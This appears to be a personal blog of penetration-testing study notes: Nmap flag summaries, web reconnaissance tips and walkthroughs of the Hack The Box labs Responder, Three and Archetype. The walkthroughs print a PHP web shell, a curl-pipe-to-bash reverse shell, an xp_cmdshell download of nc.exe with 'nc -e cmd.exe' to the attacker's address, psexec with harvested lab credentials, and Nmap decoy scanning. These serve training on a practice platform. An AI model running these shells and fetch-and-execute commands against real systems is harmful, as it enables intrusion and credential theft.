Pentest- HACK THE BOX

Pentesting Notes - HACK THE BOX

Disclaimer:

  • This document contains unedited notes and has not been formally proofread.
  • The information provided in this document is intended to provide a basic understanding of certain technologies.
  • Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
  • Some websites and software may be flagged as malware by antivirus programs.
  • The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
  • The document is not a substitute for professional advice or expert analysis and should not be used as such.
  • The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
  • The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
  • The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
  • The author reserve the right to update or change the information contained in this document at any time without prior notice.

  • Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
  • It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
  • Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
  • It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
  • It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
  • It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.

References

  • https://www.linkedin.com/learning/
  • HACKTHEBOX 

 **********************************************************************************

Nmap Commands 

Nmap Tutorial to find Network Vulnerabilities

  • nmap -sS -D 10.1.0.1
-D = decoy  and specifying a dummy ip-address 

Nmap Scripting Engine (NSE)

to check vulnerabilities 
  • sudo nmap --script vuln 

Security Testing: Nmap Security Scanning :- 

  • dig www.google.com  = gives the IP address 
-Pn  No Host discovery  = Nmap skips the host searching process & performs full target scan 
-PS means TCP SYN request
-PA means TCP ACK request
-PU means UDP request 
-PE means ICMP echo request 
-PR means ARP request

  • TCP Scan Types 
-sS    TCP SYN scan ( half open scan / stealthy  scan)
-sT = TCP  connect scan (full open scan)
-sN = TCP  NULL scan
-sF = TCP  FIN scan
-sX = TCP  Xmas scan
-sA = TCP  ACK scan
-sW = TCP window scan
-sM  = TCP maimon scan

-F  flag  does a fast scan 
e.g. nmap  -F 192.168.1.1

Timing template 

-T5  insane 
-T4  aggressive
-T3  Normal
-T2  polite
-T1 sneaky
-T0 paranoid 

-sV  = Service version detection
  • sudo nmap -sV -O -F 10.0.2.4 
E.g. = nmap -T4 -F 192.168.1.*

-A option provide details and inbuilt script of nmap scan
sudo nmap -A -T4 192.168.1.*
  • nmap saving output files
-oN = Human readable text file
-oX = Machine readable file
-oG = Grepable text file
  • -v  = allows to see progress by nmap 
DNS spoofing: 
windows powershell : ipconfig /displaydns

***********************************************************************

How to check a website:

First step to check a website with robots.txt
https://www.google.com/robots.txt

HackThisSite
hackthissite.org
HackThisSite.org, commonly referred to as HT

Page source or inspect element or Ctrl+U

Check for 
- Passwords in comments
Comments
Hidden forms

Developer tools - ctrl+Shift+I

How to scrape sitemap:

  • https://www.seowl.co/sitemap-extractor/
  • https://robhammond.uk/tools/xml-extract
  • https://www.xml-sitemaps.com/
  • https://www.mariolambertucci.com/how-to-extract-urls-from-sitemaps/

Linux commands

  • Ls
  • Cd
  • Grep
  • Su
  • Pwd
  • Whoami
  • Mv
  • Cp
  • Mkdir
  • Cat

Tools:

Kali Linux
Scanning
  • Nmap
  • Nikto
  • Zenmap
  • Threader3000
  • angry IP 
  • NetCat
  • Hydra
  • Wireshark
  • Dirbuster
  • Burp suite
Exploit
  • metasploit
***********************************************************************

HACKTHEBOX [HTB]

HTB - Responder

Microsoft employs NTLM

By taking advantage of a File Inclusion vulnerability present on a webpage hosted on a Windows machine, an attacker can collect the NetNTLMv2 hash used for authentication services implemented through technologies such as (New Technology LAN Manager) and Kerberos. The attacker can then utilize a tool called "Responder" to capture the NetNTLMv2 hash, which can subsequently be subjected to brute-force attacks using "John the Ripper" in an attempt to match the original password used to create the hash.

  • -p- : This flag scans for all TCP ports ranging from 0-65535
  • -sV : Attempts to determine the version of the service running on a port
  • --min-rate : This is used to specify the minimum number of packets Nmap should send per second; it speeds up the scan as the number goes higher
  1. nmap -p- --min-rate 5000 -sV 10.129.37.49
Apache web server running on port 80 along with WinRM on port 5985, Windows Remote Management, or WinRM,

echo "10.129.37.49 unika.htb" | sudo tee -a /etc/hosts

the /etc/hosts file is used to resolve a hostname into an IP address & thus we will need to add an entry in
the /etc/hosts file for this domain to enable the browser to resolve the address for unika.htb

File Inclusion Vulnerability

FI or Local File Inclusion occurs when an attacker is able to get a website to include a file that was not intended to be an option for this application
RFI or Remote File Inclusion is similar to LFI but in this case it is possible for an attacker to load a remote file on the host using protocols like HTTP, FTP etc.

Responder 

Microsoft developed NTLM as a set of authentication protocols, which primarily employ a challenge-response mechanism. Its purpose is to validate a client's credentials for accessing a resource within an Active Directory domain.
NTLM vs NTHash vs NetNTMLv2
*******************

HTB - Three

  • Enumeration
    • nmap -sV  10.129.77.99  

  • To access the domain thetoppers.htb in our browser, we need to add an entry for it in the /etc/hosts file with its corresponding IP address. The /etc/hosts file is responsible for resolving hostnames to IP addresses, and it is queried before the DNS server by default. Therefore, we must add an entry in the /etc/hosts file for this domain to enable the browser to resolve its address.

  • echo "10.129.77.99 thetoppers.htb" | sudo tee -a /etc/hosts 

  • Sub-domain enumeration
    • Let's also add an
    • entry for this sub-domain in the /etc/hosts file echo "10.129.77.99 s3.thetoppers.htb" | sudo tee -a /etc/hosts

  • gobuster vhost -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

  • echo "10.129.11.227 thetoppers.htb" | sudo tee -a /etc/hosts
    • 10.129.11.227 thetoppers.htb

  • apt install awscli 
    • aws configure
    • aws --endpoint=http://s3.thetoppers.htb s3 ls

  • gedit shell.php
    • <?php system($_GET["cmd"]); ?>

  • aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

    • upload: ./shell.php to s3://thetoppers.htb/shell.php


  • We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try

    • executing the OS command id using the URL parameter cmd

    • http://thetoppers.htb/shell.php?cmd=id

      • uid=33(www-data) gid=33(www-data) groups=33(www-data)


  • We can confirm that our shell is uploaded by navigating to http://thetoppers.htb/shell.php. Let us try

    • executing the OS command id using the URL parameter cmd .


  • Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload

    • which will connect back to our local machine on port 1337 .

    • We will start a ncat listener on our local port 1337 using the following command.

    • nc -nvlp 1337


  • let's start a web server on our local machine on port 8000 

    • python3 -m http.server 8000

  • We can use the curl utility to fetch the bash reverse shell file from our local host and then pipe it to bash

  • in order to execute it. Thus, let us visit the following URL containing the payload in the browser.


  • http://thetoppers.htb/shell.php?cmd=curl%2010.10.15.203:8000/shell.sh|bash

  • The flag can be found at /var/www/flag.txt .

  • cat /var/www/flag.txt


Other way to get flag: 


  • http://thetoppers.htb/shell.php?cmd=id

    • uid=33(www-data) gid=33(www-data) groups=33(www-data)


  • http://thetoppers.htb/shell.php?cmd=ls


  • http://thetoppers.htb/shell.php?cmd=ls+

    • images index.php shell.php

  • http://thetoppers.htb/shell.php?cmd=ls+..

    • flag.txt html 

  • http://thetoppers.htb/shell.php?cmd=cat+../flag.txt

*******************

Archetype


Archetype which is a Windows machine, you can have a chance to exploit a misconfiguration in Microsoft SQL Server, try getting a reverse shell and get familiarized with the use of IMPACKET tool in order to further attack some services.

nmap -sC -sV 10.129.211.114

SMB ports are open and also that a Microsoft SQL Server 2017 is running on port 1433.

root㉿kali ~ smbclient -N -L  \\\\10.129.211.114\\ 
-N : No password
-L : This option allows you to look at what services are available on a server

we can try to access and enumerate the backups 
(root㉿kali)-[~] smbclient -N   \\\\10.129.211.114\\backups
smb: \> dir
smb: \> get prod.dtsConfig 

here is a file named prod.dtsConfig which seems like a configuration file

By reviewing the content of this configuration file, we spot in cleartext the password of the user sql_svc ,
which is M3g4c0rp123 , for the host ARCHETYPE .

By reviewing the content of this configuration file, we spot in cleartext the password of the user sql_svc ,
which is M3g4c0rp123 , for the host ARCHETYPE .

Impacket is a collection of Python classes for working with network protocols.

(root㉿kali)-[~] locate mssqlclient.py
/usr/share/doc/python3-impacket/examples/mssqlclient.py

We can try to connect to the MSSQL server by using impacket's mssqlclient.py script 
root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.211.114 -windows-auth 
SQL> help
SQL> SELECT is_srvrolemember('sysadmin');
SQL> enable_xp_cmdshell
SQL> xp_cmdshell “whoami”
SQL> xp_cmdshell "powershell -c pwd"
output 
C:\Windows\system32  


Run new window 2:
python3 -m http.server


Then 
SQL> xp_cmdshell "powershell.exe wget http://10.10.14.140:8000/nc.exe -OutFile c:\\Users\Public\\nc.exe"

Window 2: output
(root㉿kali)-[/home/kali/Downloads]
└─# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.211.114 - - [01/Mar/2023 22:57:50] "GET /nc.exe HTTP/1.1" 200 -


Window 3:
(root㉿kali)-[~]
└─# nc -nvlp 4444 


Then SQL 
xp_cmdshell "c:\\Users\Public\\nc.exe -e cmd.exe 10.10.14.140 4444"

Window 3 output:
(root㉿kali)-[~]
└─# nc -nvlp 4444           
listening on [any] 4444 ...
connect to [10.10.14.140] from (UNKNOWN) [10.129.211.114] 49684
Microsoft Windows [Version 10.0.17763.2061]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
C:\Windows\system32>cd \
C:\Users\sql_svc\Desktop>
C:\Users\sql_svc\Desktop>type user.txt 
C:\Users\sql_svc\Desktop>powershell
PS C:\Users\sql_svc\Desktop> wget http://10.10.14.140:8000/winPEASx64.exe -outfile winPEASx64.exe
wget http://10.10.14.140:8000/winPEASx64.exe -outfile winPEASx64.exe
PS C:\Users\sql_svc\Desktop> ./winPEASx64.exe
PS C:\Users\sql_svc\Desktop> cd \
PS C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> type ConsoleHost_history.txt
Output- 
type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

Kill window 3 & Kill SQL window

New window 4:
──(root㉿kali)-[~]
└─# python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.129.211.114
C:\Windows\system32> 
C:\Windows\system32> cd \
C:\> cd users
C:\Users> cd Administrator
C:\Users\Administrator\Desktop> type root.txt

***********************************************************************************************************


Comments

Popular Posts

Chennai :MTC complaint cell Customer Care No.:+91-9445030516 /Toll Free : 18005991500

Marriage Registration Online steps [Tamil Nadu]

Multifactor authentication Updated for 2024